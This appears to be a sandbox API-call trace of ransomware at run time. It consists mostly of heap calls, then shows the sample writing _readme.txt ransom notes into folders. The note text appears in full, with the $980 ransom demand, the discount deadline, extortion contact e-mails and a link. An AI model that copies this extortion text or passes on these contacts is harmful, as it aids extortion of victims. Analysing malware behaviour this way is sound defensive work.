HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.933] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.933] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.933] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.933] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.933] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.933] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.933] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.933] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.933] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.933] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.933] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.933] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.933] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.933] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.933] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.933] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.933] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.933] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.933] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.933] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.933] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.933] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.933] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.933] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.933] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.933] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.933] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.933] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.933] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.933] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.934] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.934] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.934] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.934] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.934] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.934] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.934] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.934] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.934] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.934] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.934] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.934] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.934] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.934] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.934] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.934] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.934] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.934] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.934] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.934] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.934] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.934] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.934] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.934] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.934] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.934] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.934] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.934] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.934] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.935] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.935] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.935] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.935] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.935] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.935] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.935] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0127.935] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.935] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.935] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0127.935] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.935] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0127.935] PathFindFileNameW (pszPath="") returned="" [0127.935] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.935] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0127.936] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0127.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0127.936] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0127.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2b08 [0127.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.936] FreeLibrary (hLibModule=0x759d0000) returned 1 [0127.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x81c) returned 0xdcd2b08 [0127.936] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0127.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.936] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 0 [0127.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x7d00) returned 0xdd2c688 [0127.938] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0127.938] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0127.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd3390 [0127.938] CreateFileW (lpFileName="C:\\Boot\\es-ES\\_readme.txt" (normalized: "c:\\boot\\es-es\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c4 [0127.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8c0) returned 0x7516fe8 [0127.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x85c) returned 0x49db7d8 [0127.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or 